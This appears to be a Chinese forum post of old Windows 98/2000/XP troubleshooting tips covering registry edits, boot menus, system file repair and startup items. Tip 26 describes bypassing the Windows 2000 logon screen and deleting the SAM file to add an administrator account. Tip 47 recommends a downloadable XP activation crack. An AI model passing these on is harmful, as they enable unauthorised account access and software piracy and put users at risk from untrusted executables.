    HKEY_CURRENT_USER：一个指向结构中分枝的指针。
    HKEY_LOCAL_MACHINE：该关键字包含了本地计算机的硬件和软件的全部信息。
    HKEY_DYN_DATA：包含了系统属性中的动态数据-即发生事件的有关信息。
    HKEY_CURRENT_CONFIG：指向HKEY_LOCAL_MACHINECONFIG结构中的分支的指针。

    在“注册表编辑器”窗口中，依次点击：HKEY_CURRENT_USER、Software、Microsoft、Internet Explorer、Main(该过程类似于依次打开文件夹，因此常常记作 HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain，以后均采用此方法)，在右边的窗口中可以看到一系列的值项(所谓值项是指出现在注册表窗口右窗格中的数据字符串，它定义了当前所选项的值。值项有三个部分：名称、数据类型和值本身)。
    浏览器的标题是通过 HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain 注册表项下 Window Title 的值项来设置的。如果无该值项，则系统会显示缺省的名称“Microsoft Internet Explorer”，也就是说如果要改回系统原来的设置，则删除该值项即可。
十一:IE经常会弹出一些窗口,IE窗口不能最大化。
<一>:<1>IE经常会弹出一些窗口，如“当前的脚本发生错误",建议你把IE最好升级成为IE 6。
<2>IE窗口不能最大化。
启动“注册表编辑器”，找到“HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain”键，删除其中的键值“Window_Placement”，再删除 “HKEY_ CURRENT_USERSoftwareMicrosoftInternet ExplorerDesktopOld WorkAreas”键。关闭注册表编辑器并重新启动。打开IE浏览器，按窗口右上角的“最大化”按钮，再按“还原”按钮，然后再按“最大化”按钮，最后关闭IE浏览器。下次再打开IE浏览器时，浏览器窗口就会最大化了。但该办法在部分计算机上有效，有时无效。
<3>Internet Explorer浏览器非常不稳定，经常出现各种错误

<二>:Internet Explorer浏览器自Internet Explorer 5版本即内置了修复工具，除了可以用于修复Internet Explorer浏览器，也可以用于添加与删除Internet Explorer浏览器组件。用以下三种方式启动。
1. 打开“开始→设置→控制面板→添加/删除程序”，在“安装/卸载”对话框中选择“Internet Explorer 5和Internet 工具”，单击“添加/删除”按钮，在弹出的窗口中选择“修复Internet Explorer”。
2. 打开“开始→程序→附件→系统→系统信息”，在“Microsoft 系统信息”窗口中单击“工具”，选择“Internet Explorer修复工具”。
3. 如果“Internet Explorer修复工具”的认证过程没有有效执行，或者Internet Explorer浏览器没有在“控制面板”的“添加/删除程序”中被列出，那么还可以通过命令行的方式来启动“Internet Explorer修复工具”，运行
“Rundll32 setupwbv.dll,IE5Maintenance "C:\rogram FilesInternet ExplorerSetupSETUP.EXE" /g
C:WINDOWSIE Uninstall Log.Txt（注意：该命令行区分大小)
4.只能打开浏览器上网，别的什么都干不了！提示：“Windows找不到这个文件，DOS C\WINDOWS\COMMAND 找不到这个文件名”。
查杀病毒，再重新安装一遍系统以恢复Command.com文件就可以了.
<三>:禁止IE的错误报告!方法如下:
1、IE 5.X
单击“开始”→“设置”→“控制面板”→“添加”/“删除程序”；在安装和删除目录下，选中“Internet Explorer Error Reporting”，然后点击“添加/删除”按钮（Windows 98/Me/NT）或“删除”（Windows 2000）按钮。
2、Windows 9X/Me/NT/2000下的IE 6
打开“注册表编辑器”，找到[HKEY_LOCAL_ MACHINE SoftwareMicrosoftInternet ExplorerMain]，在右侧窗格中创建一个名为IEWatsonEnabled的双字节值(即DWORD值，16进制)，将其值设置为0。
3、Windows XP下IE 6
单击“开始”→“控制面板”→“系统”→“高级”，单击“错误报告”按钮，然后选中“禁用错误报告”，下面的“但在发生严重错误时通知我”可以选中.
十二:恢复982000XP双启动菜单,(以下以2000为例)
方法一:开始--运行 输入：c:boot.ini 确定.或:
1:先进入Windows 98 操作系统了，在桌面上双击“我的电脑”，再选择C盘双击进入。
2:单击窗口上部菜单栏中的“查看”一项，选择“文件夹选项”中的“查看”属性，将“高级设置”中的“隐藏文件”选项中内容置为“显示所有文件”，然后单击“确定”保存设置。
（3）查看C盘的根目录并找到Boot.ini文件，在打开之前，我们先要修改此文件的只读属性，右键单击Boot.ini 文件，选择“属性”，打开属性栏并将其中“只读”字样前的对勾去掉，然后单击“确定”保存设置。
（4）左键双击打开Boot.ini文件，接下来将其内容修改为：
982000的双系统启动菜单
[boot loader］
timeout=30
default=multi(0)disk(0)rdisk(0)partition(2)WINNT
C:=”Microsoft Windows ”
multi(0)disk(0)rdisk(0)partition(2)WINNT=“Microsoft Windows 2000 professional”/fastdetect
98XP的双系统启动菜单)设置的内容修改为:
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(2)WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(2)WINDOWS="Microsoft Windows XP Professional" /fastdetect
C:=Microsoft Windows"
2000XP的双系统启动菜单
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(2)WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(2)WINDOWS="Microsoft Windows XP Professional" /fastdetect
multi(0)disk(0)rdisk(0)partition(1)WINNT="Microsoft Windows 2000 Professional" /fastdetect

修改完毕后保存文件退出。当再次启动电脑时，丢掉的双启动菜单就回来了。
方法二:把Windows XP安装光盘插入光驱中，并在开机时按“Del”键进入CMOS，将启动顺序设置为“CD-ROM、C、A”，从光驱启动，重启即可进入Windows XP安装光盘的引导安装模式，等到安装系统需要拷贝复制文件时，按“F3”键退出安装，Windows XP就会重新扫描计算机上已经安装的操作系统，重新启动后就可以看到启动菜单了
方法三1. 插入Windows XP安装盘，重新启动电脑，进入安装界面后，按下“R”键， 进入“Microsoft Windows XP（TM） 故障恢复控制台”界面；
2. 系统会搜寻已安装的Windows XP系统文件，然后显示搜寻结果，并询问“要登录到哪个Windows XP安装（要取消，请按Enter）”，选择Windows XP安装位置选项，系统会要输入“管理员密码”，键入安装Windows XP时设置的管理员密码，回车；
3. 在安装路径下输入修复命令Fixboot C:，回车。修复完成后，重启就可以恢复双启动菜单了。
十三:每次拨号上网的时候，经常在检查密码与用户名的时候就好像不动了,或经常断流.
把原来网络连接删除,再重新设置过.
重新网络连接还是不好,就把原来的的调制解调器网卡的驱动删除,再重装调制解调器网卡的驱动.
<<注>>:必需先把原来的驱动删除再重装.
十四:Outlook出错,无法发送接收邮件.巧用Outlook Express邮箱:
1:打开Outlook点工具点账户点邮件属性点服务器在账户属性，smtp服务器设置中，勾选“我的服务器需要身份验证”点确定.
2:巧用Outlook Express邮箱:
1:如果是MyIE2.0,你点工具点电子邮件点文件点标识点添加新标识按提示操作即可.
(也可直接打开Outlook Express点文件点标识点添加新标识按提示操作即可)
2:打开Outlook Express点工具点帐户点邮件点属性输入Outlook Express```
接收````里打上钩点服务器填好后我的服务器要求身份验证里打上钩点高级在服务器上保留邮件里打上钩点确定就可以了.
3:点文件点标识点添加新标识(按提示操作即可)可以把所有的EM都设置到Outlook Express上,
以后要看邮件,只要打开Outlook Express点文件点切换标识就可以了.
4:Outlook Express不能打开邮件 :打开Outlook Express点工具点选项点安全,将“不允许保存或打开可能有病毒的附件”选项去除，就可以顺利打开附件了。
十五:WINDOWS 蓝屏蓝屏、缺少DLL文件.
释放系统文件是一种比较有效的方法，很多朋友在使用系统时遇到的问题都需要使用Windows 98安装盘释放CAB文件的办法来解决。在“资源管理器”或“我的电脑”中双击包含有需要释放系统文件的CAB压缩包，Windows 98就会为该压缩包打开一个单独的窗口，从中选择欲释放的系统文件并将其拖至目标目录即可。如果你不了解需要释放的文件，还可以利用Windows 98的“系统文件检查器”恢复系统文件，从而解决遇到的问题。
1. 在“开始”菜单中依次打开“程序→附件→系统工具→系统信息”
2. 在“工具”下拉菜单中选中“系统文件检查器”，会弹出一个窗口。
3. 在这里，除了可以对已有的系统文件进行检查、扫描之外，还可按照用户的要求从安装盘释放用户所需的系统文件，并且它会自动安装盘中的所有CAB压缩包进行搜索以找出用户所需的文件。再也无需掌握欲释放的系统文件到底存放在哪个CAB压缩包中了。
另外也可去看这帖:【转载】WINDOWS 蓝屏错误代码说明一览表 .
十六:98启动就像是死机了，系统提示Explorer没有响应。
这可能是一些开机自动加载程序（如防火墙之类的）和系统中的其他程序有冲突，用安全模式启动，然后到系统的启动程序组中（在“开始→运行”中输入Msconfig打开“系统配置实用程序”中的“启动”标签），看看是否有什么“可疑”的程序加入了而导致了这种情况，将它们禁止。
十七:启动Outlook，Messenger就自动启动.
方法<1>:最好最快的是:直接把所有的MES卸载(删除)就可以了.
方法<2>:在“开始”中单击“运行”，输入“gpedit.msc”，打开“组策略”窗口。在左边窗口中，依次打开“计算机配置管理模板Windows组件Windows Messenger”分支，然后在右窗格中双击“不允许运行Windows Messenger”，系统弹出“不允许运行Windows Messenger属性”对话框，选中“已启用”复选钮，确定即可。
方法<3>启动时禁止自动调用:Windows Messenger
删除HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MSMSGS此键
十八:保存备份Windows XP和Office XP激活文件和信息的方法
Windows XP的激活文件是wpa.dbl，位于C: WINDOWSsystem32文件夹中，您可以把该文件复制到安全的地方，当重装Windows XP后，把备份的wpa.dbl文件覆盖C: WINDOWSsystem32文件夹中的同名文件即可激活Windows XP了。
要备份Office XP的激活信息，需要做如下两项工作。
1. 备份mso.dll和data.dat文件。mso.dll文件位于C:\program FilesCommon Files\Microsoft SharedOffice10文件夹中；data.dat文件位于Application Data Microsoft OfficeData文件夹，但该文件夹的位置会因Windows版本而不同，所以请使用Windows“开始”菜单中的“查找”或“搜索”命令找到该文件，然后将其复制到安全的位置。
2. 备份注册表信息。打开“注册表编辑器”，展开HKEY_LOCAL_MACHINE SoftwareMicrosoftOffice10.0Registration分支，然后在“注册表”（Windows 98）或“文件”（Windows XP）菜单中，单击“导出注册表文件”（Windows 98）或“导出”（Windows XP），在“保存在”框中定位一个安全的位置，在“文件名”框中键入一个文件名称，比如可以键入“xpjh”，单击“保存”按钮。以后，在重新安装Office XP后，就可以用备份的data.dat和mso.dll覆盖原文件，并双击xpjh.reg文件，将备份的注册表信息导入注册表即可激活Office XP了
十九:使用播放软件
<1>Realoneplayer不能卸载安装
若是按默认路径安装，在C:\progarm FilesRealRealone PlayerSetup中有个rlpclean，打开它就可以卸载了.再重新安装RealONE Player。
<2>:使用播放软件、收听一些网络流媒体时，经常出现断断续续的现象.
单击“工具→选项”命令，在“选项”对话框中单击“性能”标签，在“网络缓冲”中选择“缓冲时间”，然后适当地增加缓冲时间.
二十:关闭上网时系统常常弹出“信使服务”
在“开始”菜单中选择“运行”，然后输入“Net Stop Messenger”就可以将信使服务停止，这样别人在给你发送消息时你就收不到了。想恢复时，使用命令“Net Start Messenger”进行恢复信使服务即可。
二十一:开机都会跳出一个对话框：“加载C\windows\downlo1\cnsmin．dll时出错找不到指定模块”.
CnsMin.DLL文件是安装了网络实名插件后，Windows系统目录中添加的一个文件。可能是由于该文件损坏或丢失，而网络实名插件则需要随Windows启动自动运行，所以就会出现开机出错的提示框。你可以重新安装一遍网络实名来解决问题，也可以在“开始→运行”中输入“msconfig”，在启动中将“CnsMin”禁止就可以了。
二十二:桌面上点鼠标右键没什么反应.
打开“注册表编辑器”，找到“HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer”分支，看是否有一个名为“NoViewContextMenu”的主键，它就是桌面无法使用右键的罪魁祸首，将它删除重启一次机器即可解决。
二十三:安装或卸载某些大型软件时出现以下对话框：“未处理的异常情况”，“错误号码是：0x80070725 说明：RPC占位程序的版本不兼容，安装程序立即停止！”
RPC意思是“远程调用程序”，主要用于通过网络将应用程序函数调用转发到远程系统。出现系统警告“RPC占位程序不兼容”，一般是系统中有关的网络组件程序发生了问题。容易出现这种问题的情况有：
1. 用户安装的新程序里面的网络功能与98系统有冲突。比如金山毒霸、东方卫士有新的网络防火墙功能，请安装微软发布的补丁：http://download.microsoft.com/download/msninvestor/Patch/1.0/WIN98/EN-US/mcrepair.exe。
2. 安装有网络功能的游戏。为了加快网络游戏的速度，许多游戏设计时大量采用了32位以上的RPC支持功能，而许多Windows 98用户中却并没有这样的系统文件。如果是安装游戏出错，请安装DirectX 8或以上版本，并正确配置网络协议。
3. 安装Office时出错。安装前不要安装防火墙、网络虚拟光驱等网络程序
二十四:2000XP进入DOS状态.
方法<1>:放进系统光盘(安装盘)设光驱启动重启屏幕显示(以XP为例):
1:安装Windows XP　PRO原版
2:启动98SE的DOS启动盘.
3:启动工具菜单.
4:从硬盘启动.
6:重新启动.
可选<2>启动98SE的DOS启动盘

方法<2>常规方法是不允许进入DOS状态的，因为Windows XP不是基于DOS设计的。不过Windows XP确实支持一个仿DOS命令行的环境，在其中我们可以运行大部分的DOS命令，甚至许多DOS下的游戏软件也可以运行，它就是Windows XP的恢复控制台。首先将Windows XP安装盘放入光驱，然后在运行中输入“F:/i386winnt32.exe/cmdcons”，F表示光驱盘符。确定后开始安装，安装好后重新启动计算机，在操作系统选择菜单中会多“Windows XP Recovery Console”选项，通过它就可进入系统故障恢复控制台了.
或者:在运行键入：cmd
二十五:巧用2000XP安装光盘 <<修复系统.解决系统文件丢失>>
放进系统光盘(安装盘)设光驱启动重启屏幕显示(以XP为例):
1:安装Windows XP　PRO原版
2:启动98SE的DOS启动盘.
3:启动工具菜单.
4:从硬盘启动.
6:重新启动.
方法一:选1:安装Windows XP　PRO原版全新安装XP复制完文件的后重新启动计算机.按F8进入系统.
选3:启动工具菜单屏幕显示:
1:启动OOBC BLueCom 4.0.445
2:启动GHOST 7.5菜单恢复盘.
3:启动万能DM启动盘.　<<磁盘工具 >>
4:KV3000 DOS杀毒盘.
5:瑞星 DOS杀毒盘.
6:启动 PowerQuest PartitionMagic 8.0 (DOS)　<<磁盘工具>>
7:启动MSNET启动盘.
方法二:<1>点开始点运行输入CMD回车 输入 SFC 点击确定扫描损坏或者更新的系统文件了.或光驱启动进入C盘，键入命令sys c:
<2>98恢复注册表开机按F8进dos,命令行下输入 scanreg/restore 然后选择最近日期，回车重启(步骤是：关闭计算机，重新启动时按下F8键，选择“Commandpormptonly”进入DOS模式，进入Windows98系统所在的目录（例如为WINDOWS）,键入SCANREG/RESTROE命令，系统会提示注册表备份情况，包括CAB文件名及备份时间等，用户可以选择要恢复的CAB文件进行恢复。恢复完成后，可以重新启动计算机正常进入Windows98系统。)
注册表如何还原恢复:重启电脑即按下F8键，选择“Commandpormptonly”进入DOS模式,进DOS后,命令行下输入　 scanreg/restore　 回车　 出现如下提示：
? :displays usage　显示方式
backup :backup the registry and related system configuration files.备份注册表
restore :choose a backup to restore　选择备份的注册表
fix :repair the registry　 修复注册
comment=<comment>　 注释
:adds the specified comment to the cab file while backing up
  返回　删除
选restore :choose a backup to restore　选择备份的注册表这个选项,然后选择最近日期，回车重启.试试恢复注册表.
<3>98系统:开始→程序→附件→系统工具→系统信息”，然后单击“工具→系统文件检查器”。

<4>XP系统先把光盘(安装盘)放进光驱点开始点运行输入CMD输入 SFC/SCANNOW 按提示操作修复
<5>1．在DOS环境下，执行如下系列命令：
    Attrib -h -r -s C:system.1st
    Attrib -h -r -S C:windowsSystem.dat
    Copy C:system.1ST C:windowssystem.dat
    Attrib +h +r +s c:system.1st
    Attrib +h +r +s C:windowssystem.dat
    2．重新启动Windows 98。
    由于System.1ST保存的是Windows 95/98第一次正常运行时的系统信息，后面更改的Windows 95/98
软硬件配置信息头，未被更新到这个文件中。因此，此方法只能进行最保守的恢复。
<3>2000XP系统先把光盘(安装盘)放进光驱点开始点运行输入CMD输入 SFC/SCANNOW 按提示操作修复.
二十六: 登陆密码登不了忘了密码进不了系统:

1、重新启动Windows XP，在启动画面出现后的瞬间，按F8，选择"带命令行的安全模式"运行。
2、运行过程停止时，系统列出了超级用户administrator和本地用户的选择菜单，鼠标点击administrator，进入命令行模式。
3、按Alt+ctrl+del片刻以后出现系统资源管理器。点选文件→打开然后查找WINXP盘中windows根目录下的explorer.exe，运行它.
方法二:在登陆的时候按ctrl+alt+del两下，就会出现登陆界面，输入administrator以及密码就可以了。
开机即按F8进安全模式将系统目录下windows NTsystem32config 把此目录下的SAM文件名的文件删除,重机开机.就可以了（前提是你的系统是在打SP补丁之前，因为现在的补丁都解决了这个漏洞，否则删了SAM你就慢慢等着重新装系统吧）.
方法三:开机即按F8进安全模式在运行输入gpedit.msc点确定打开组策略点安全设置帐户策略调整右边框里的选项,都把它调整为"没有定义".重启电脑.
方法四:试试:（同样，这个方法还是在打SP补丁之前，相对于那些老版本和未打补丁之前的系统）
（1）在Windows2000启动之后，按照屏幕提示按下ALT＋CTRL＋DEL进行登录，在登录界面将光标移至用户名输入框，按键盘上的Ctrl+Shift键进行输入法的切换，屏幕上出现输入法状态条，在出现的“全拼”输入法中将鼠标移至输入法状态条点击鼠标右键，出现的选单中选择“帮助”，然后继续选择“输入法入门”，在窗口顶部会出现几个按钮，奥妙就在“选项按钮”上。
（2）如果系统未安装Windows2000 ServicePack1或IE5.5，那么现在就可以在“操作指南”窗口上边的标题栏单击右键，选择“跳至URL”，此时会弹出Windows 2000的系统安装路径并要求输入路径，输入c:WinNTsystem32（假设Windows 2000安装在c: WinNT下），按下“确定”，我们就成功地绕过了身份验证进入系统的system32目录。
（3）在system32目录下找到“net.exe”，用鼠标右键单击并选择“创建快捷方式”；右键单击该快捷方式，在“属性”“快捷方式”“目标”里输入“c:winntsystem32
et.exe user backup ABC/ADD”，然后点击“确定”。
这一步骤的目的在于用Net.exe创建一个backup用户，密码为大写的ABC，双击该快捷方式完成用户的添加。
（4）现在把backup用户添加到Administrators（管理员组中），同样把Net.exe的快捷方式目标修改为“c:winntsystem32
et.exe LOCALGROUP Administrators backup/ADD”，双击执行。
（5）最后用backup用户登录,并修改你原先用户的密码，最后当然不要忘了删除这个backup用户。

二十八:文件共享:
在Win2000 professional的用户管理中使GUEST用户有效就可以了。

进控制面板→用户和密码→高级→高级→点“用户”文件夹→然后在右边的Guest（供来宾访问计算机或访问域的内置帐户）上点右键进行其属性设置→在常规选项中将“帐户已停用”前的勾去掉即可。
    以“每服务器”模式安装的Windows 2000 Server、Windows 2000 Advanced Server系统，操作方法是：控制面板→管理工具→计算机管理→“系统工具”选项里“本地用户和组”→然后在右边的Guest（供来宾访问计算机或访问域的内置帐户）上点右键进行其属性设置→在常规选项中将“帐户已停用”前的勾去掉即可。
WinXP在启用了系统Guest用户的前提下，依次点击“开始→运行”，输入“gpedit.msc”命令，调出组策略编辑器。逐层展开“本地计算机策略→计算机配置→Windows设置→安全设置→本地策略→用户权利指派”，拖动右侧的滚动条，可以看见“拒绝从网络访问这台计算机”这一项,删除Guest用户.
二十九:找回丢失的桌面图标:
右击桌面点新建点快捷方式点游览:Program Files`这个文件夹里找到图标点确定即可.
三十:98下如何在DOS下输入和查看中文:
在提示符下输入pdos95，回车，就可以看中文了.
三十一QQ运行异常缓慢
安装QQ的最新版QQ2000b Build 1020（可以从腾讯公司的网站下载）。（2）打开控制面板点系统点高级点性能设置点视觉效果页中的自定义，把拖拉时显示窗口内容这一项去掉即可。
三十二:无法关联BMP
运行注册表编辑器，将HKEY-CLASSES-ROOTSystemFileAssociationsimage键删除掉，进入看图软件进行关联设置就行了。
三十三: 使用高级配置工具（仅限专业版:系统配置程序)
点开始点运行输入gpedit.msc即可.
三十四:查看Windows XP详细系统信息
点开始点所有程序点附件点命令提示符输入systeminfo后回车系统即开始检测相关信息，就可以看到Windows XP设置的详细信息了。
三十五：为什么电脑关机以后会自动重起？
1:有可能是主板BIOS中的电源设置不正确引起的。
进入BIOS设置，选取并进入“Power Management Setup”（电源管理设置），
然后将其中的“Power On By Ring”（从Modem唤醒）设置为“Disable”.
2:点开始运行键入regedit选HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControl
CrashControl,
将AutoRebootdword 值更改为0重启.
三十六:修复程序无法在Windows XP下运行(不是全部有效)
右键单击程序的图标，选择“属性”，打开属性对话框，选择“兼容性”标签，在“兼容模式”栏内选择合适(一般选98)的系统，最后点击“确定”。
三十七:隐藏桌面上的所有图标
打开到：HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer，在右边空白处单击鼠标右键，选择"新建"的"DWORD"，然后输入名字为"NoD
esktop"，再双击它，修改NoDesktop为1表示生效，即没有桌面，0 则相反。重新启动电
脑后，你会发 现桌面已变得空荡荡一片。
三十八:提高菜单的显示速度
点击“开始”“运行”，再输入RegEdit，运行注册表编辑器，
打开：HKEY_CURRENT_USERControl PanelDesktop，从“编辑”菜单中选“新建”串值
,串值名取MenuShowDelay，回车，再双击MenuShowDelay，改动MenuShowDelay的数字就
可调节速度， 范围是1-2000，默认是400，数字越小越快，如果改为65535就表示要按键
才显示了。 输出键值1。关闭注册表编辑器，并重新启动Windows后，你将发现开始菜单
中子菜单的显示速度明显提高了。
四十:修复误删除有用的文件
通过软件,只要数据没有被覆盖都可以恢复！
工具:
<1>Recover4all
    Advanced Utilities GmbH公司的Recover4all工具能够自动搜索并列出磁盘上已被完全删除的文件的目录，而没有被删除文件的目录则不被列出。使用Recover4all，实际上只需要点四下鼠标就可以了，一是点击被删文件所在的驱动器，二是点击目录，三是点击文件，四是点击工具条上的“Recover”按钮，被删文件若没被覆盖的话，就被恢复了。
http://www.recover4all.com ;
EasyRecovery
<2>Ontrack 公司的EasyRecovery 是一个功能非常强大的硬盘数据恢复工具，能够帮助用户恢复丢失的数据以及重建文件系统。由于EasyRecovery主要是在内存中重建文件分区表使数据能够安全地传输到其他驱动器中，用户可以从被病毒破坏或是已经格式化的硬盘中恢复数据，被破坏的硬盘中像丢失的引导记录、BIOS参数数据块、分区表、FAT表、引导区，都可以由它来进行恢复。
    http://www.ontrack.com ;
<3>东石VDP7
    东石资讯股份有限公司一直致力于从事电脑工具类及网络应用类的高新技术软件研发，其主要产品有虚拟光碟、虚拟还原和虚拟教室等“虚拟”系列软件。最新推出的虚拟光碟V7．0单机版（VDP7）在以往版本的基础上，提供了更加人性化的操作界面和强大的功能。VDP7可以支持多种视窗操作系统，包括最新的Windows XP，并且能够识别多分区引导启动。
    http://www.farstone.com.cn/ ;
四十一:关于启动项
开始运行msconfig启动或regedit/s (Windows 9X/Me/XP ,Win2000不可用)
在Windows 9X/Me/XP系统中，点开始运行输入Msconfig点确定，在打开的系统配置实用程序窗中选择启动项目。
而在Windows 2000这个功能被禁止了，但可以通过把Windows XP的Msconfig文件借过来。可将C:WINDOWSPCHEALTHHELPCTRBinaries目录下的Msconfig拷贝至 Windows 2000目录中。
默认的启动项目:
  启动项目中，不同系统不同用户不会相同.
    1.Windows 9X/Me
    Internat.exe：这是Windows 98/Me输入法切换程序。可以禁用其自动运行，但关闭其运行后在系统托盘区内便看不到输入法的图标。
    ScanRegistry：注册表备份程序。如果注册表被破坏，可利用其自动备份进行修复，因此建议不要禁用。
    TaskMonitor：任务检测程序。它可监视软件的使用情况，结果会保存在系统盘windowsapplog文件夹下的applog.ind文件中，建议不要禁用。
    SystemTray：管理驻留内存的程序。当内存被占满时会自动释放不再被使用的信息，建议不要禁用。
    LoadPowerProfile：电源管理程序。建议不要禁用。
    SchedulingAgent：系统计划任务程序，对于没有采用计划任务程序的用户(大部分用户没有使用它)，可以禁用。
2.Windows XP
    IMJPMIG：微软输入法编辑程序的一部分，使计算机能够输入亚洲的字符，建议不要禁用。
    TINTSETP：微软新注音输入法程序。建议不要禁用。
    MsnMsgr：微软即时通信软件MSN Messenger程序。可以禁用。
    3.Windows 2000
    RUNDLL32：作用是呼叫32位的链接库，使计算机能够执行.dll类文件。建议不要禁用。
    Internat：与Windows 9X/Me相同。
    在各系统中，除了这些默认启动项外，还有一些硬件的驱动程序也会产生启动项，如果禁止它们便会使相应硬件不能正确使用。
    三、设置启动项
    我们可对自己想禁用的程序进行禁止。先在启动项中找到要禁止的启动项，再在它前面的方框中单击鼠标左键，使方框中的小钩被去掉，然后单击系统配置实用程序窗下端的“应用”钮就可以了。例如大家在安装QQ后，会发现每次重启计算机进入后都会弹出QQ登录窗，如果想禁止它在系统启动后自动运行，在Msconfig窗口中的“启动”标签下，找到“腾讯QQ”，用鼠标单击“启动项目”栏中的方框，去掉勾选，再按“确定”退出。重启计算机后QQ就不会自动运行了。当然如果以后又需要它在开机时就运行，可再进入启动标签，在它前面的方框勾选即可。
    对于相应程序在Msconfig中产生的启动项，一般都与原程序名称相同，同时也可查看启动项目后的命令栏，查看其对应的路径及程序名称来核实要禁止的程序。
四十二:下载工具下载链接时没有任何反应:
打开下载工具点工具点监视将“所使用的浏览器”打勾，然后将“监视的文件类型”尽量添加全一些。还有如果下载软件的安装目录有中文的话也会使监视功能失效。
四十三:Windows ME系统C盘无故被占用＿RESTORE无法删除:
进控制面板打开系统点属性点性能点文件系统点疑难解答在最下面的禁用系统还原选项前打上勾点确定关闭还原功能。由于该文件是系统文件，是不能删除的，即使可以在DOS下删除，但系统重新启动后又会出现的。不过我们可以使用注册表将其改动一下，在注册表编辑器中依次打开HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices，删除其中的“*StateMgr”项目，重新启动电脑后你就不会再看到_RESTORE文件夹了。
四十四:开机按F1才能继续:
一般是因为BIOS中的参数与实际的硬件不符造成的，进入BIOS中看看有哪些选项设置不当，或干脆把BIOS恢复默认,另外也有可能是因为CMOS电池接触不良或电力耗尽所造成。
四十五:在安装Windows XP2000系统时系统提示出现错误“Boot sector writeVIRUScontinue (Y/N)？”然后就是死机，重新杀毒之后安装还是如此:
这是因为主板BIOS的设置中防病毒功能被打开的缘故。Windows在安装时会向硬盘的主引导区写入数据，如果主板BIOS的防病毒功能被打开，就会导致硬盘主引导区无法写入任何数据，使得安装程序无法继续运行，而导致死机。解决的方法很简单，只需在安装操作系统前，先暂时将主板的防病毒功能关闭即可，进入BIOS，选择BIOS FEATURES SETUP(BIOS功能设定)→“VIRUS WARNING”(病毒警告)或是“Anti-Virus Protection”(病毒保护)，将“Enabled0(开启)”改为“Disabled”(禁用)即可。
四十六: 无法装载动态连接库msnp32.dll,系统找不到指定文件，下列部分或全部功能已经失去作用：MicrosoftNetwork
    点开始点运行输入Regedit进入注册表，搜索有关“msnp32.dll”的项目和键值并删除，然后用鼠标右键点击“我的电脑”－“属性”把“设备管理器”下的网卡，“网上邻居”中网络属性下的所有组件都删除，重新启动系统后重装网络组件。
四十七:windows xp激活。
试试:重启电脑即按f8进入安全模式，进入安全模式后到控制面板里选添加删除程序，把编号为kb821557和kb823980的两个补丁卸载掉．或开始运行输入regedit.exe打开注册表编辑器，单击“编辑→查找”打开“查找”窗口，在此窗口中选择“项、值、数据”三个选项，再在“查找目标”中输入该软件名，单击“查找”按钮，如果找到相关项，直接将其删除，再按“F3”键继续查找，直至将整个注册表搜索完毕为止，最后重新启动系统。
(注:以后再更新的时候记住别再把这两个更新加入更新列表中了).
下载一个破解文件。
完全自动激活程序，只要安装后按F8进入完全模式执行该程序，就完成自动激活。适用所有XP版本！比以前的破解程序方便多了。极力推荐！注意一定要在安全模式下执行。
http://51jieyan.51.net/soft/winxpcrack.rar
确认后，windows xp便被激活
注意一定要在安全模式下执行。
四十八:资源管理器进程:winrpcsrv.exe、winrpc.exe、wingate.exe、syshelp.exe、rpcsrv.exe、iexplore.exe、winVNC.exe….均为病毒
教你手工清除"恶邮差"病毒iexplore.exe http://www.pconline.com.cn/pcedu/soft/virus/jq/0302/135355.html
四十九:解决屏幕倒置的方法
有时使用某些播放器会出现影像倒置的问题，重新起动系统，重新安装软件都不能解决。解决方法是：右键点击右下脚当前任务栏绿色小箭头，选择Original Picture即可。（Flipped Picture则是倒置图像）
或在显示器右下角的播放插件标志上右击 ,在出现的对话框里选original clip
五十:禁用任务管理器
可以通过组策略的限制禁止用户使用它。在“开始-运行”窗口中输入“gpedit.msc”，回车后进入组策略管理界面，依次选择“用户配置-管理模版-系统-ctrl+alt+del选项”，启用“删除任务管理器”即可。
五十一: 卸载Win2000。
如果你打算不再使用Win2000而只使用Win9x，可以将其卸载。卸载的方法很简单，先用Win9x的启动盘启动计算机，然后在A:>提示符下运行“sys c：”命令，将系统盘的引导文件覆盖，然后再将Win2000安装目录中的所有文件删除即可。
五十二:网络蚂蚁下载失效,点击下载链接时没有任何的反应.
    问题可能出在你并没有开启软件的监视功能所致，在工具栏中有个“监视”选项，将“所使用的浏览器”打勾，然后将“监视的文件类型”尽量添加全一些。另外,如果下载软件的安装目录有中文的话也会使监视功能失效。
五十三:如何彻底删除软件:
    开始运行输入regedit.exe打开注册表编辑器，单击“编辑→查找”打开“查找”窗口，在此窗口中选择“项、值、数据”三个选项，再在“查找目标”中输入该软件名，单击“查找”按钮，如果找到相关项，直接将其删除，再按“F3”键继续查找，直至将整个注册表搜索完毕为止，最后重新启动系统。
五十四:XP如何加载１６位应用程序
      在Windows安装目录下的Windowscommand文件夹里DOS程序start.exe，它是一个在Windows状态下调用DOS程序的工具，可以直接在DOS提示符下使用。命令格式为：Start/seperate e:tctc.exe。“seperate”参数是指在内存里开辟一个单独的空间来运行16位程序，还有一个参数“shared”则是在共享的内存空间启动16位程序。[/hide]


电脑应用技巧问答

《一键清理系统垃圾》

电脑应用技巧问答

问：我的电脑不能使用键盘右边的小数字键区域了，“NumLock”灯是亮的，前几天还好好，我又没有动什么地方。请问问题出在哪里？
答：如果你使用的是Windows 2000/XP的话，可能是由于启动了鼠标键功能，小数字键盘就被用来控制鼠标指针，失去了输入功能。选择“控制面板→辅助功能选项→鼠标”，然后将“使用鼠标键”去掉即可。

问：我的电脑已经安装好Windows XP系统以及很多常用软件，现在由于工作需要想再安装Windows 98系统，我知道安装双系统必须先装Windows 98再装Windows XP，但我不想删掉Windows XP再重新安装，请问有什么办法吗？如何让双启动菜单出来？请帮忙！
